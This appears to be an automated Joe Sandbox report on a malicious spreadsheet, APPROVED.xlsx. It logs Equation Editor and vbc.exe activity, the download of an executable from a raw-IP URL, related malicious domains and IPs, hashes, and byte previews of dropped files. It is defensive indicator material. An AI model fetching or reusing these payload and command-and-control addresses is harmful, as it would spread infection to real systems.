                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/413096/sample/APPROVED.xlsx

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        08:28:59API Interceptor137x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                        08:29:05API Interceptor168x Sleep call for process: vbc.exe modified
                                                                                                                                                        08:29:37API Interceptor512x Sleep call for process: explorer.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        104.21.65.7lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?iBIXf4M=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&_RAd4V=YL0THJvhl8d
                                                                                                                                                        dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?0pk=FtxhArA&FjUHSn=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1ZX8ma6yUqB
                                                                                                                                                        lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?E48=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VuwH26lS2QTgoFqA==&oPqLWb=dVeDBDrHInjx
                                                                                                                                                        gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?K81d7=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&uTrL=Apdlbf
                                                                                                                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?4h3=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25HzHKCsxDG&vTapK=LJBpc8p
                                                                                                                                                        loMStbzHSP.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.cyrilgraze.com/p2io/?7nEpiRy=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&sZvD8l=Spap-DKpf
                                                                                                                                                        75.2.66.247Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • www.insershop.com/iu4d/?L2JH=bFjm+7dIUkDoytiq4+cmnuPDP86R5rhIsCCYhRI/G0MMS6HA97F4PgWpOqqF2KUNtHj/hw==&0n=fxlp
                                                                                                                                                        0iEsxw3D7A.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.qscrit.com/8rg4/?6l=VsHc7njAYTBvoczWHdQttC0IXDsqEoT2aspGnMNUW1tx9TWSknVAapEIqjACukXLl20z&_FN4EJ=3fnDH
                                                                                                                                                        iPv5du05Bu.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.qscrit.com/8rg4/?ExoHs=VsHc7njAYTBvoczWHdQttC0IXDsqEoT2aspGnMNUW1tx9TWSknVAapEIqjACukXLl20z&alX=TXFDhzv0K60l
                                                                                                                                                        googlechrome_3843.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.colliapse.com/csv8/?jL30v=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&JB4DYN=9rhd62lx1hk
                                                                                                                                                        54.85.86.211REVISED ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.raphaelyejesiel.com/owws/?0pn=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&uDKhk=JfrPs86HdHGxMH
                                                                                                                                                        o52k2obPCG.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?UlSp=GTgP1nZH9J34Epg&tZU4=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gmXBr8fNrAN1suaqA==
                                                                                                                                                        q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?N4=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&2d=Yn8xRlsx
                                                                                                                                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?CR=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gmXBr8fNrAN1suaqA==&QL0=ehux_83x40_XBX2
                                                                                                                                                        Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?QJ=h484VFbPZ8O&Ztxhw=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==
                                                                                                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?uFNl=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&-ZSXw=ctxh_fYh
                                                                                                                                                        Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?i4=7neTsXcxP&mdslChH=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jKUdbwnAK9b
                                                                                                                                                        KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?TT=FjUh3Tu&idCtDnlP=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b
                                                                                                                                                        27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.brunoecatarina.com/p2io/?RR=YrKhZvg&rp=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jKUdbwnAK9b
                                                                                                                                                        RFQ MEDICAL EQUIPMENT_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.marianaesilvio.com/i9p8/?BZ=/ObYwKDkQ2IwhvSmnWHDiNFOgR3i1I/dScSLJZ0AsNZcru1aWxc+dYbzc/ypuU5uo2MC&rvRxXN=hBj0Uri0f8R
                                                                                                                                                        ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src
                                                                                                                                                        JwekqCZAwt.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD
                                                                                                                                                        request.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6
                                                                                                                                                        PO#646756575646.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE
                                                                                                                                                        PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        www.cyrilgraze.comlFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.138.177
                                                                                                                                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.138.177
                                                                                                                                                        KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.138.177
                                                                                                                                                        loMStbzHSP.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.65.7
                                                                                                                                                        www.hfjxhs.comRDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        R22032021-PROCESSED.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 156.241.53.161
                                                                                                                                                        www.brunoecatarina.como52k2obPCG.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.85.86.211
                                                                                                                                                        www.myfavbutik.com5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.161.4
                                                                                                                                                        qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.15.16
                                                                                                                                                        dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.161.4
                                                                                                                                                        Request For Courtesy Call.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.15.16
                                                                                                                                                        g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.161.4
                                                                                                                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.15.16
                                                                                                                                                        shops.myshopify.com1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        New_Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        correct invoice.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        PP,Sporda.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        Purchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        New Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        slot Charges.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        PO09641.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        PO889876.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        Order Euro 890,000.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        winlog.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        products order pdf .exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        REVISED ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        AMAZONEXPANSIONGBREQUEST FOR COURTESY CALL 2.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.36.109.92
                                                                                                                                                        FORM ZIM911C.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.36.109.92
                                                                                                                                                        Commercial and Technical Proposal for%0D%0A Supply.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.36.91.55
                                                                                                                                                        Request For Courtesy Call.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.36.91.55
                                                                                                                                                        MkisahOBqH.dllGet hashmaliciousBrowse
                                                                                                                                                        • 3.52.190.137
                                                                                                                                                        CLOUDFLARENETUS4c045e17_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.22.18.188
                                                                                                                                                        ACH WIRE PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 104.18.27.190
                                                                                                                                                        Stolen Images Evidence.jsGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.157.17
                                                                                                                                                        17D54F646D676B09788537F84FC3BFC8699D78A6B11B9.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.26.14.145
                                                                                                                                                        e.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Purchase Order_12052021.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.19.200
                                                                                                                                                        5781525.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.150.89
                                                                                                                                                        50eba5e3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.20.184.68
                                                                                                                                                        6f61bc36_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.20.185.68
                                                                                                                                                        50eba5e3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.20.184.68
                                                                                                                                                        5781525.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.150.89
                                                                                                                                                        6f61bc36_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.20.184.68
                                                                                                                                                        7e718f4b_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.145.48
                                                                                                                                                        1ChCpaSGY7.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.20.184.68
                                                                                                                                                        1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.74
                                                                                                                                                        M7LEWK86J8.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.13.168
                                                                                                                                                        Product specification.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.171.184
                                                                                                                                                        595e3339_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.156.7
                                                                                                                                                        7+ Taskbar Tweaker.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.151.27
                                                                                                                                                        7+ Taskbar Tweaker.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.0.149
                                                                                                                                                        AMAZON-AESUS34d0a579_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 100.26.111.6
                                                                                                                                                        7bYDInO.rtfGet hashmaliciousBrowse
                                                                                                                                                        • 52.45.173.110
                                                                                                                                                        presupuesto.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        title deed.docxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        title deed.docxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        executable.2772.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.223.115.185
                                                                                                                                                        af04e6c8_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        0000003602.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.6.206.192
                                                                                                                                                        INV-Receipt.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 54.225.169.203
                                                                                                                                                        gCcAUOanux.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.223.115.185
                                                                                                                                                        RFQ-2176 NEW PROJECT QUOTATION MAY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.93.205.129
                                                                                                                                                        title deed.docxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        title deed.docxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        svch.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.225.144.221
                                                                                                                                                        e0896563_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.223.115.185
                                                                                                                                                        Purchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.223.115.185
                                                                                                                                                        presupuesto.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 54.83.52.76
                                                                                                                                                        installer_win.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.72.172.158
                                                                                                                                                        FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.223.115.185
                                                                                                                                                        WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.0.7.30
                                                                                                                                                        AMAZON-02USXPChvE6GQdGet hashmaliciousBrowse
                                                                                                                                                        • 18.133.194.34
                                                                                                                                                        ACH WIRE PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 13.224.193.116
                                                                                                                                                        ACH WIRE PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.130.4.114
                                                                                                                                                        #Ud83d#Udce0Lori's Fax VM-002.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 13.224.193.12
                                                                                                                                                        1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 44.227.76.166
                                                                                                                                                        595e3339_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 13.225.75.73
                                                                                                                                                        GmCEpa2M7R.dllGet hashmaliciousBrowse
                                                                                                                                                        • 13.225.75.73
                                                                                                                                                        New-Order 04758485.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.16.197.4
                                                                                                                                                        350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        7bYDInO.rtfGet hashmaliciousBrowse
                                                                                                                                                        • 52.210.171.182
                                                                                                                                                        nT5pUwoJSS.dllGet hashmaliciousBrowse
                                                                                                                                                        • 54.247.61.18
                                                                                                                                                        1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                                                                                        • 44.230.85.241
                                                                                                                                                        Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                        • 18.219.49.238
                                                                                                                                                        main_setup_x86x64.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.192.141.1
                                                                                                                                                        A6FAm1ae1j.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.138.180.119
                                                                                                                                                        New_Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 75.2.115.196
                                                                                                                                                        NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 13.58.50.133
                                                                                                                                                        YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                                                                                                        • 99.83.175.80
                                                                                                                                                        yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                                                                                                        • 99.83.175.80
                                                                                                                                                        Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe
                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:downloaded
                                                                                                                                                        Size (bytes):1832960
                                                                                                                                                        Entropy (8bit):7.369530849111079
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Sv0H4JghFaUabDkakP0/ZeGPDWOlxm0Zx:Y4o/b5f/hR3m0
                                                                                                                                                        MD5:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        SHA1:2DB671375AE170FF9B3E733FED98C2C7E7EF355A
                                                                                                                                                        SHA-256:D69E95A9CA264C1547CDB2475244A145E79A321A58D35C2B2DD6183A032AAF16
                                                                                                                                                        SHA-512:3A2FD22C948DD0A26B8971C9A907E6FC29AE1F5F32B1B6B23836D29C13E172D6D8C404F3BDFF976F8A20E28968D48A316E1437EB6EFC99FD03C581B44B08A984
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        IE Cache URL:http://3.36.53.50/dose/xele.exe
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.`..............P.................. ... ....@.. .......................`............@.................................@...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................t.......H.......Tm..4............................................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....o!...(4....*N..(....o....(5....*&..(6....*.s7........s8........s9........s:........s;........*....0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*.0...........~....o@....+..*.0..<........~.....(A.....,!r...p.....(B...oC...sD..........
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32EBDEF2.emf
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7592
                                                                                                                                                        Entropy (8bit):5.465200468507679
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:znf0EUcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bMKSTxK/LA/FVoL3QtKhn+e3+wi
                                                                                                                                                        MD5:08D7A2D1135E3AE03182C9C215EB5855
                                                                                                                                                        SHA1:CD4D3C60B1F98608CE83DD5AF888042CE8A24C25
                                                                                                                                                        SHA-256:47C18D083371F44EBBBCC16EF469F919990B78A3376672454E0BF10B56D0A1CC
                                                                                                                                                        SHA-512:ADB4C156197F14BA2A22A778271605B57C19F7244C5F135011728F3454BB349F65FBF7A4E4D051E9765B64A0F2089CCE9336BDAC113A36D8E7B51CC5D53CDE31
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................kv..(..............%.q................D.3...3.'..r....\...D.3.....D.3...3.W..r....D.3..6kv_..r.......r..(.4..qP.3....q0..q.......q...q........4..q..3....q.......q...........q..3........q4t.q...q............<.!v.Z.u......(.......(........................udv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5670BE4B.jpeg
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):48770
                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75056775.emf
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3199944
                                                                                                                                                        Entropy (8bit):1.0723406875580421
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JFPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:JmIvhGJd7mIvhGJd2
                                                                                                                                                        MD5:4419315DEF025A089BDF3A5E556AEC7E
                                                                                                                                                        SHA1:66C3C106879A9692FC60010AE6D5FCD68EF271AB
                                                                                                                                                        SHA-256:3A9C525D24D8BE65C6B9D130AC603EB897FAAC656F1DF27E499489263563AB82
                                                                                                                                                        SHA-512:7E4A69334F0E8ADF58DA02CA0D37EDBF38AE75B1EEDF72EB6D65AF6AF17F932EB53CF45186EBB8241210876649BB4561FE69C6C292801CDAFBEE08BB1E387091
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ....l............................F...%.. EMF......0.........................8...X....................?......F...ti..hi..GDIC........JGDm....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
